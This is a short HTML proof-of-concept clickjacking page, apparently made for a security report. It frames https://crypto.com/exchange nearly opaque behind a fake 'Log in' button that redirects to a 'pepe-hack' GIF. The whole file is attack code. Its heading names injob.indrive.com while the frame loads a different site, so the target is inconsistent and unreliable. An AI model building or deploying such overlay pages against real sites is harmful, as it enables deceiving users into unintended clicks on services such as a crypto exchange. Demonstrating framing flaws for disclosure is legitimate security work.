<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PoC Clickjacking Test</title>
    <style>
        body {
            text-align: center;
            font-family: Arial, sans-serif;
        }

        h2 {
            color: red;
        }

       
        .fake-login {
            position: absolute;
            top: 50px;
            left: 50%;
            transform: translateX(-50%);
            padding: 10px 20px;
            background-color: #007bff;
            color: white;
            border: none;
            cursor: pointer;
            font-size: 18px;
            z-index: 10; 
        }

    
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            opacity: 0.8;
            pointer-events: auto;
            z-index: 5;
        }
    </style>
</head>
<body>
    <h2>PoC Clickjacking - injob.indrive.com</h2>
    <button class="fake-login" onclick="redirect()">Log in</button>
    <iframe src="https://crypto.com/exchange"></iframe>

    <script>
        function redirect() {
            window.location.href = "https://media.tenor.com/XXAXt1WWm3YAAAAj/pepe-hack-hack.gif";
        }
    </script>
</body>
</html>
